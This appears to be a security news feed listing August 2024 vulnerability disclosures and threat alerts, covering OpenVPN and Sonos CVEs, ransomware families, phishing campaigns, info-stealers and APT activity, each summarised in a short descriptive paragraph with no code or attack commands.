The cloud seems complex, but it's what happens behind the scenes that really complicates things. Some services utilize others as resources as part of their logic/operation. Interestingly enough, it turns out that this could lead to catastrophic results if done unsafely.

10.8.24

CVE-2024-38200

VULNERABILITY

CVE

Microsoft Office Spoofing Vulnerability

10.8.24

CVE-2024-27459

VULNERABILITY

CVE

The interactive service in OpenVPN 2.6.9 and earlier allows an attacker to send data causing a stack overflow which can be used to execute arbitrary code with more privileges.

10.8.24

CVE-2024-24974

VULNERABILITY

CVE

The interactive service in OpenVPN 2.6.9 and earlier allows the OpenVPN service pipe to be accessed remotely, which allows a remote attacker to interact with the privileged OpenVPN interactive service.

10.8.24

CVE-2024-27903

VULNERABILITY

CVE

OpenVPN plug-ins on Windows with OpenVPN 2.6.9 and earlier could be loaded from any directory, which allows an attacker to load an arbitrary plug-in which can be used to interact with the privileged OpenVPN interactive service.

10.8.24

CVE-2024-1305

VULNERABILITY

CVE

The tap-windows6 driver version 9.26 and earlier does not properly check the size data of incoming write operations, which an attacker can use to overflow memory buffers, resulting in a bug check and potentially arbitrary code execution in kernel space.

10.8.24

OpenVPN vulnerabilities

VULNERABILITY

CVE

Chained for attack: OpenVPN vulnerabilities discovered leading to RCE and LPE

10.8.24

CVE-2023-50809

VULNERABILITY

CVE

A vulnerability in the Sonos One Gen 2 Wi-Fi stack that does not properly validate an information element while negotiating a WPA2 four-way handshake, leading to remote code execution

10.8.24

CVE-2023-50810

VULNERABILITY

CVE

In certain Sonos products before Sonos S1 Release 11.12 and S2 release 15.9, a vulnerability exists in the U-Boot component of the firmware that allows persistent arbitrary code execution with Linux kernel privileges. A failure to correctly handle the return value of the setenv command can be used to override the kernel command-line parameters and ultimately bypass the Secure Boot implementation. This affects PLAY5 gen 2, PLAYBASE, PLAY:1, One, One SL, and Amp.

10.8.24

Cisco Small Business SPA300 Series and SPA500 Series IP Phones Web UI Vulnerabilities

VULNERABILITY

CVE

Multiple vulnerabilities in the web-based management interface of Cisco Small Business SPA300 Series IP Phones and Cisco Small Business SPA500 Series IP Phones could allow an attacker to execute arbitrary commands on the underlying operating system or cause a denial of service (DoS) condition.

9.8.24

English-Spanish Speaking Ransomware Actor Targets Linux Machines

ALERTS

RANSOM

Symantec has recently observed a Linux ransomware variant binary that appears to be connected to an English- and Spanish-speaking double-extortion ransomware actor. At this time, their modus operandi remains unclear, but the ransomware exhibits the following behavior.

9.8.24

Cryptocurrency-themed lure sites used for phishing attacks

ALERTS

CRYPTOCURRENCY

Threat actors are creating thousands of cryptocurrency-themed lure sites used for phishing attacks that target users of cryptocurrency wallet brands like MetaMask, WalletConnect, Coinbase, Trezor, Ledger, Bitget, Exodus, Phantom, and others. These actors are using free hosting services such as GitBook and Webflow to create lure sites on crypto wallet typo-squatted subdomains like the following.

9.8.24

New malspam campaigns delivering multiple Trojans

ALERTS

SPAM

A number of malspam campaigns were seen which delivered various Trojans by attempting to exploit an old Microsoft Office vulnerability. CVE-2017-0199 is still targeted to allow execution of remote code from within an XLS file. The campaigns delivered a malicious XLS file with a link from which a remote HTA or RTF file would be executed to download the final payload. We observed GuLoader, Remcos RAT, and the Sankeloader infostealer as payloads.

9.8.24

Sora AI-themed branding used to distribute malware

ALERTS

AI

Threat actors have created various phishing sites that impersonate official Sora platforms to lure victims into downloading files disguised as legitimate Sora software in order to distribute harmful payloads, including data stealers and cryptocurrency miners. When users attempt to install what they believe to be the authentic application(s), the files trigger malicious processes that compromise the victim’s system.

9.8.24

Phish emails impersonate UK's Health and Safety Executive (HSE) to lure email users

ALERTS

PHISHING

The Health and Safety Executive (HSE) is a British public provider of health and safety solutions to various professionals and organizations. Lately, Symantec has observed phish runs that impersonate Health and Safety Executive (HSE) guidelines, especially the strategy outlined for 2022-2032, to steal credentials.

9.8.24

New file-less ransomware variant Cronus discovered

ALERTS

RANSOM

A new file-less ransomware variant dubbed Cronus has been reported as part of a malware campaign. Users are lured with documents masquerading as PayPal receipts. These documents contain malicious embedded VBA macros that, when executed, download a PowerShell loader. The loader then uses reflective DLL loading to deploy the ransomware DLL, aiming to evade detection.

9.8.24

RHADAMANTHYS Stealer Targeting Users in Israel

ALERTS

VIRUS

RHADAMANTHYS stealer, active since 2013 and offered as Malware-as-a-Service, recently began targeting Israeli users with Hebrew phishing emails containing a malicious RAR attachment. The RAR file, posing as a notification from "Calcalist" or "Mako" (two prominent businesses in Israel), extracts three components: a malicious executable, a DLL file, and a support file. Upon execution, RHADAMANTHYS employs anti-analysis techniques to avoid detection and initiates a multi-staged infection process to establish a presence on the compromised system.

9.8.24

0.0.0.0 Day

EXPLOIT

EXPLOIT

0.0.0.0 Day: Exploiting Localhost APIs From the Browser

9.8.24

Downgrade Attacks

HACKING

Attack

Windows Downdate: Downgrade Attacks Using Windows Updates

9.8.24

CVE-2024-21302

VULNERABILITY

CVE

(CVSS score: 6.7) - Windows Secure Kernel Mode Elevation of Privilege Vulnerability

9.8.24

CVE-2024-38202

VULNERABILITY

CVE

(CVSS score: 7.3) - Windows Update Stack Elevation of Privilege Vulnerability

9.8.24

StopRansomware BlackSuit (Royal) Ransomware

RANSOMWARE

RANSOMWARE

The advisory was updated to notify network defenders of the rebrand of “Royal” ransomware actors to “BlackSuit.” The update includes new TTPs, IOCs, and detection methods related to BlackSuit ransomware. “Royal” was updated to “BlackSuit” throughout unless referring to legacy Royal activity. Updates and new content are noted.

9.8.24

CVE-2024-4885

VULNERABILITY

CVE

In WhatsUp Gold versions released before 2023.1.3, an unauthenticated remote code execution vulnerability exists in Progress WhatsUp Gold. WhatsUp.ExportUtilities.Export.GetFileWithoutZip allows execution of commands with iisapppool\nmconsole privileges.

8.8.24

SbaProxy leveraged to hijack legitimate antivirus software

ALERTS

EXPLOIT

A recent report detailed how threat actors are leveraging a tool dubbed 'SbaProxy', disguised as a legitimate anti-virus software component, to create a proxy connection through a C2 server. The tool is distributed with malicious intent in multiple formats such as DLLs, EXEs, and PowerShell scripts, which makes it challenging to detect due to its authentic look and advanced functionality.

8.8.24

Lynx Ransomware

ALERTS

RANSOM

Lynx is another double-extortion ransomware actor that has been fairly active in recent weeks and has claimed multiple companies as victims on their website. They claim to have a strict policy against targeting governmental organizations, hospitals, non-profits, and other sectors vital to society.

8.8.24

Malware campaign exploits secureserver.net domain to deploy banking trojan

ALERTS

CAMPAIGN

A new banking trojan malware campaign is exploiting the secureserver.net domain to target Spanish and Portuguese-speaking regions. The multistage attack begins with malicious URLs leading to an archive containing an obfuscated .hta file.

8.8.24

Chameleon trojan targets hospitality Industry

ALERTS

VIRUS

A new Chameleon mobile banking Trojan campaign has been reported targeting the hospitality industry. Employees of a Canadian restaurant chain with international operations were lured by a deceptive app masquerading as a legitimate CRM application.

8.8.24

Zola - a new Proton ransomware variant

ALERTS

RANSOM

Zola is a recently discovered variant from the Proton ransomware family. The ransomware is written in C++ and employs a multi-threaded encryption process. Upon encryption, the malware appends the .zola extension to the encrypted files. Zola will also attempt to encrypt files on any network devices, if present.

8.8.24

How Malicious Actors Are Leveraging Cloud Services

ALERTS

GROUP

The number of threat actors leveraging legitimate cloud services in their attacks has grown this year as attackers have begun to realize their potential to provide low-key and low-cost infrastructure. Traffic to and from well-known, trusted services such as Microsoft OneDrive or Google Drive may be less likely to raise red flags than communications with attacker-controlled infrastructure.

8.8.24

Italian campaign targeting certified email users delivers Vidar infostealer

ALERTS

CAMPAIGN

The Vidar infostealer has been observed as the payload of a recent malspam campaign targeting users in Italy. The campaign was distributed to users of certified email mailboxes and delivered a JavaScript downloader via a link in the email. The JavaScript was responsible for downloading and executing a PowerShell script, which in turn led to the final payload.

8.8.24

Mispadu (aka URSA) Trojan Malware

ALERTS

VIRUS

Mispadu Stealer (aka Ursa) was recently observed in another malspam campaign targeting systems configured with Spanish or Portuguese as their language setting. Similar to their previous campaigns, a spam email themed as an overdue invoice serves as the initial vector; it then lures users into downloading a malicious ZIP file.

7.8.24

SLUBStick

EXPLOIT

Linux

SLUBStick: Arbitrary Memory Writes through Practical Software Cross-Cache Attacks within the Linux Kernel

7.8.24

CVE-2024-42008

VULNERABILITY

CVE

A cross-site scripting flaw via a malicious email attachment served with a dangerous Content-Type header

7.8.24

CVE-2024-42009

VULNERABILITY

CVE

A cross-site scripting flaw that arises from post-processing of sanitized HTML content

7.8.24

CVE-2024-42010

VULNERABILITY

CVE

An information disclosure flaw that stems from insufficient CSS filtering

7.8.24

GoGra

MALWARE

Backdoor

Cloud Cover: How Malicious Actors Are Leveraging Cloud Services

7.8.24

CrowdStrike Reveals

INCIDENT

INCIDENT

External Technical Root Cause Analysis — Channel File 29

7.8.24

Chameleon

MALWARE

Mobile Trojan

Chameleon is back in Canada and Europe

7.8.24

XDSpy phishing campaign targets organizations in Russia and Moldova

ALERTS

PHISHING

A phishing malware campaign by a threat actor dubbed XDSpy has been reported targeting organizations in Russia and Moldova. The attack chains typically use spear-phishing emails with archive attachments containing agreement-related lures to deploy a primary malware module called XDDown.

7.8.24

Spike in activity delivering Magniber ransomware

ALERTS

RANSOM

A spike in activity leading to infection with the Magniber ransomware has been observed in the wild. Attackers spreading this malware variant are known to leverage various delivery methods, including malvertisements, cracked software installers and exploitation of known vulnerabilities.

7.8.24

OSX and Windows malware spread under the disguise of meeting or productivity software

ALERTS

VIRUS

Ongoing campaigns spreading malware disguised as meeting or productivity applications have been reported in the wild. Some recent examples include attacks masquerading as the productivity app called Wasper or the Clusee meeting application.

7.8.24

HeadLace backdoor distributed by the Swallowtail APT

ALERTS

VIRUS

The latest research from Palo Alto reports on a recent HeadLace backdoor distribution campaign attributed to the Swallowtail APT (aka Fighting Ursa, APT28). The attackers have been leveraging car-for-sale phishing lures in efforts to distribute the malicious payloads.

7.8.24

Persistent IRATA attacks in Italy

ALERTS

SPAM

Their modus operandi hasn't changed much over that period; they mainly leverage malicious SMS (smishing) messages containing URL redirections to their malicious apps as the vector of infection. They constantly rotate their social engineering tactics, with Symantec having observed multiple Italian financial services being abused for masquerading purposes.

7.8.24

Are faxes still relevant? This credential harvesting campaign thinks so

ALERTS

CAMPAIGN

Symantec has recently observed a phishing campaign impersonating fax notifications. These notifications carry subjects similar to 'Incoming Fax Delivered for user**@****.com' and instruct users to open the attached HTML and enter their credentials in order to view the fax.

7.8.24

Lumma Stealer via Social Media and AI-Related Lure

ALERTS

VIRUS

There have been reports of a malvertising scam in which cybercriminals hijacked social media pages to promote fake AI photo editors, ultimately tricking users into downloading a prevalent but run-of-the-mill stealer known as Lumma.

7.8.24

Trust (Crypto) Wallet users targeted with a new phishing wave

ALERTS

CRYPTOCURRENCY

Trust Wallet is a crypto wallet that provides its users with services such as buying, selling, storing, swapping and managing their cryptocurrencies. Lately, Symantec has observed phishing runs that impersonate Trust Wallet services and entice users to open fake notification emails.

7.8.24

BITSLOTH Backdoor

ALERTS

VIRUS

BITSLOTH is a Windows backdoor that researchers have uncovered in Latin America; it abuses the Background Intelligent Transfer Service (BITS) for command-and-control operations. According to the report, it has been developed over several years and can log keystrokes, capture screens and gather extensive data.

6.8.24

Moonstone Sleet

GROUP

GROUP

Stressed Pungsan: DPRK-aligned threat actor leverages npm for initial access

6.8.24

CVE-2024-38856

VULNERABILITY

CVE

Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue.

6.8.24

Android Security Bulletin—August 2024

OS

Android

The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2024-08-05 or later address all of these issues.

6.8.24

LianSpy

MALWARE

Android

LianSpy: new Android spyware targeting Russian users

5.8.24

STRRAT

MALWARE

RAT

Bloody Wolf strikes organizations in Kazakhstan with STRRAT commercial malware

5.8.24

CVE-2024-6242

ICS

Vulnerability

Rockwell Automation Logix Controllers

5.8.24

BlankBot

MALWARE

Android Banking

BlankBot - a new Android banking trojan with screen recording, keylogging and remote control capabilities

5.8.24

StormBamboo

MALWARE

Backdoor

StormBamboo Compromises ISP to Abuse Insecure Software Update Mechanisms

4.8.24

Panamorfi

CAMPAIGN

DDOS

A New Discord DDoS Campaign

3.8.24

Increased Activity Against Apache OFBiz CVE-2024-32113

SANS

SANS

As part of its extensive project portfolio, the Apache Foundation supports OFBiz, a Java-based framework for creating ERP (Enterprise Resource Planning) applications. OFBiz appears to be far less prevalent than commercial alternatives. However, just as with any other ERP system, organizations rely on it for sensitive business data, and the security of these ERP systems is critical.

3.8.24

APT28

APT

APT

Today, APT28 is consistently attributed to GRU Unit 26165, 85th Main Special Service Centre (GTsSS) of the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GU/GRU). This attribution is mainly based on an indictment unsealed by the US Department of Justice (DoJ) in 2018.

3.8.24

Fighting Ursa

APT

APT

A Russian threat actor we track as Fighting Ursa advertised a car for sale as a lure to distribute HeadLace backdoor malware. The campaign likely targeted diplomats and began as early as March 2024. Fighting Ursa (aka APT28, Fancy Bear and Sofacy) has been associated with Russian military intelligence and classified as an advanced persistent threat (APT).

3.8.24

APT41

APT

APT

APT41 likely compromised Taiwanese government-affiliated research institute with ShadowPad and Cobalt Strike

3.8.24

BITSLOTH

MALWARE

Backdoor

BITS and Bytes: Analyzing BITSLOTH, a newly identified backdoor

3.8.24

BlankBot Mobile banking trojan targeting Turkish users

ALERTS

VIRUS

BlankBot is a new mobile banking Trojan variant that has emerged on the threat landscape, primarily targeting Turkish users. BlankBot abuses Android Accessibility services to gain full control over the infected device and collect information from it.

3.8.24

NetSupport RAT Campaign

ALERTS

VIRUS

NetSupport Manager has been weaponized by threat actors to perform malicious activities, executing as a Remote Access Trojan (RAT). Over time, various campaigns have been identified, each building on the previous one in an attempt to evolve evasion techniques through multiple obfuscation updates.

3.8.24

AutoIT scripts leveraged by the latest Konni RAT malware

ALERTS

VIRUS

Konni RAT malware observed in a recent distribution campaign has been using AutoIT scripts for detection evasion. The attack chain includes the use of .LNK files contained within .zip archives. The .lnk shortcut files are often disguised as documents and carry double extensions, for example ".hwp.lnk".

3.8.24

Spike of activity observed for the Neshuta malware

ALERTS

VIRUS

During the last month, Symantec observed a spike in activity attributed to the Neshuta (aka Neshta) malware family. Neshuta is an older file infector that has been observed in the threat landscape since as early as 2005. Its main function is to prepend virus code to executable files and collect basic system information.

3.8.24

Grayfly (aka APT41) threat group deploying ShadowPad and Cobalt Strike in recent attacks

ALERTS

APT

As reported by researchers from Cisco Talos, the Grayfly threat group (also known as APT41) has been deploying ShadowPad malware and Cobalt Strike beacons in a recent distribution campaign observed in Taiwan. The attackers have been reported to exploit an old and vulnerable version of a Microsoft Office IME file (imecmnt.exe) for second-stage loader and payload execution.

3.8.24

Bloody Wolf delivers STRRAT malware

ALERTS

VIRUS

A malware campaign by the APT group dubbed Bloody Wolf targeting organizations in Kazakhstan has been reported. The attackers are sending phishing emails that impersonate the Ministry of Finance of the Republic of Kazakhstan and other agencies.

3.8.24

Mandrake mobile spyware

ALERTS

VIRUS

A new variant of the Mandrake mobile spyware has been distributed via several apps hosted on the Google Play store. The oldest of the apps, called AirFS, was first uploaded to the store in 2022 and remained available for download until March this year.

3.8.24

TgRAT malware returns with a Linux variant

ALERTS

VIRUS

TgRAT is a malware variant discovered in 2022 that initially targeted Windows systems. Earlier this month, a Linux version of this RAT was observed being distributed in the wild. Upon infection of the targeted machine, the malware is used to execute arbitrary commands and scripts, collect screenshots or extract user files from the compromised host. TgRAT is controlled by the attackers via a Telegram bot.

2.8.24

SARA Android Ransomware Targets Vietnamese Mobile Users in Fake App Scheme

ALERTS

RANSOM

Android lockers and ransomware were prevalent a couple of years ago, especially during the RansomLock craze. Today, while they remain in the mobile threat landscape, their prevalence has dwindled. These threats typically lock users out of their devices and display a ransom message, demanding payment to regain access with an unlock code.

2.8.24

DeerStealer malware spread via fake Google Authenticator websites

ALERTS

VIRUS

A new malicious campaign distributing an infostealer variant dubbed DeerStealer has been identified in the wild. The malware is spread in the guise of a fake Google Authenticator app, with the malicious binary hosted on a GitHub repository.

2.8.24

SMS Stealer - extensive Android malware distribution campaign

ALERTS

VIRUS

An ongoing large-scale operation distributing an Android malware variant called SMS Stealer has been reported to be infecting mobile devices across the world. The campaign has been active since at least 2022 and targets victims in 113 countries.

2.8.24

ModiLoader malware campaign targeting Small and Medium-Sized Business (SMB) in Poland

ALERTS

VIRUS

ModiLoader (aka DBatLoader) malware has been deployed in recent campaigns targeting Small and Medium-Sized Businesses (SMBs) in Poland, Italy and Romania. ModiLoader has been spread via malicious email attachments in various file formats such as .img, .tar, .rar or .iso. ModiLoader is a Delphi-based malware used to download and execute final payloads delivered to the compromised machines. The payload varies; the reported campaigns have executed malware from the Agent Tesla, Remcos and Formbook families.

2.8.24

DoNot APT Targeting Pakistani Android Mobile Users

ALERTS

APT

APT-C-35 (aka DoNot APT Group) has been active in conducting cyberattacks since at least 2013. Recently, they have targeted Pakistani Android mobile users. Their attacks typically start with phishing campaigns, leading to the deployment of Android malware known as StealJob. The primary objective of these threat actors is to access confidential information and intellectual property. Their techniques include encryption and fileless malware to evade detection.

2.8.24

Protection Highlight: Ransomware-as-a-Service Evolution, Impact, Mitigation

ALERTS

RANSOM

Malware evolution in the threat landscape is the singular reason cybersecurity professionals can't rest, and Ransomware-as-a-Service (RaaS) is no different. RaaS has evolved from its first known form, Reveton, in 2012 to the most recent arrival, Eldorado ransomware, with early incidents reportedly raking in amounts of $400K USD a month and modern-day data breaches costing over $1M, sometimes far in excess of that figure.

2.8.24

Leafperforator campaign exploits Pakistan’s Maritime Affairs documents to spread JavaScript malware

ALERTS

CAMPAIGN

A new malware campaign by the Leafperforator (also known as SideWinder) threat actor, utilizing enhanced tactics and techniques, has been reported. This threat actor relies on spear-phishing emails and targets Asian countries. In the latest campaign, users are tricked with documents related to employee termination or salary cuts, leading them to open a disguised file. This file exploits a known security flaw (CVE-2017-0199) to establish contact with a malicious domain masquerading as Pakistan's Directorate General Ports and Shipping. The domain then retrieves an RTF file exploiting CVE-2017-11882, leading to the delivery of JavaScript malware.

2.8.24

Phishing Campaign: Malicious HTML attachment mimics OneDrive to deploy malware Scripts

ALERTS

PHISHING

A new phishing campaign using image files that mimic a Microsoft OneDrive page has been reported. Users are targeted through phishing emails with HTML attachments. When these attachments are opened, they display an image resembling a OneDrive page and show an error indicating a connection issue with the OneDrive cloud service.

2.8.24

Recent activities attributed to the UNC4393 threat group

ALERTS

GROUP

The threat actor dubbed UNC4393 has been active in the threat landscape since at least 2022. The group has been known to leverage a wide variety of malware variants and custom tools in their attacks, including Basta ransomware, KnotWrap dropper, KnotRock tool, DawnCry dropper or the PortYard tunneler.

2.8.24

Exela Stealer continues to be distributed in the wild

ALERTS

VIRUS

Exela Stealer is a Python-based malware initially discovered in the threat landscape just last year. New campaigns distributing this infostealer continue to be observed in the wild in recent weeks.

2.8.24

Flame Stealer malware

ALERTS

VIRUS

Flame Stealer is a new C/C++-based infostealing malware variant advertised for sale on Discord and Telegram. The malware can collect and exfiltrate various information about the infected machine, Discord tokens, clipboard data, credentials, banking information and browser cookies, among others.

2.8.24

Sitting Ducks

ATTACK

Domain

Researchers at Infoblox and Eclypsium have discovered that a powerful attack vector in the domain name system (DNS) is being widely exploited across many DNS providers.

2.8.24

BingoMod

MALWARE

RAT

BingoMod: The new Android RAT that steals money and wipes data

2.8.24

ERIAKOS

CAMPAIGN

Scam

"ERIAKOS" Scam Campaign: Detected by Recorded Future's Payment Fraud Intelligence Team

2.8.24

DigiCert Revocation Incident

INCIDENT

Certification

DigiCert Revocation Incident (CNAME-Based Domain Validation)

2.8.24

DEV#POPPER campaign

CAMPAIGN

CAMPAIGN

The Securonix Threat Research team has been monitoring the threat actors behind the DEV#POPPER campaign. In the ongoing investigation, additional malware variants have been identified that are linked to the same North Korean threat actors, using similar, stealthy malicious code execution tactics, though now with much more robust capabilities.

2.8.24

Cuckoo Spear

GROUP

GROUP

Cuckoo Spear – the latest Nation-state Threat Actor targeting Japanese companies

2.8.24

Linux.BackDoor.TgRat.2

MALWARE

RAT

A trojan for Linux with a wide range of functions and the ability to be remotely controlled via a Telegram bot. The source code is written in Go and encrypted with RSA.

2.8.24

TgRAT

MALWARE

RAT

At the first stage, the dropper checks the parameters (arguments) used for its launch: this impacts the intermediate persistence stage. If there are input arguments, the add_payload stage begins (named after the function that performs it).

2.8.24

SMS Stealer

MALWARE

SMS

Unmasking the SMS Stealer: Targeting Several Countries with Deceptive Apps

2.8.24

Turla

APT

APT

Turla: A Master’s Art of Evasion

2.8.24

Mandrake

MALWARE

Spyware

Mandrake spyware sneaks onto Google Play again, flying under the radar for two years

2.8.24

ModiLoader

MALWARE

Loader

Phishing targeting Polish SMBs continues via ModiLoader

2.8.24

OneDrive Pastejacking

CAMPAIGN

PHISHING

OneDrive Pastejacking: The crafty phishing and downloader campaign

2.8.24

OneDrive Pastejacking

PHISHING

PHISHING

OneDrive Pastejacking: The crafty phishing and downloader campaign

2.8.24

CVE-2024-37085

VULNERABILITY

CVE

VMware ESXi contains an authentication bypass vulnerability. A malicious actor with sufficient Active Directory (AD) permissions can gain full access to an ESXi host that was previously configured to use AD for user management (https://blogs.vmware.com/vsphere/2012/09/joining-vsphere-hosts-to-active-directory.html) by re-creating the configured AD group ('ESXi Admins' by default) after it was deleted from AD.

2.8.24

CVE-2023-45249

VULNERABILITY

CVE

Remote command execution due to use of default passwords. The following products are affected: Acronis Cyber Infrastructure (ACI) before build 5.0.1-61, Acronis Cyber Infrastructure (ACI) before build 5.1.1-71, Acronis Cyber Infrastructure (ACI) before build 5.2.1-69, Acronis Cyber Infrastructure (ACI) before build 5.3.1-53, Acronis Cyber Infrastructure (ACI) before build 5.4.4-132.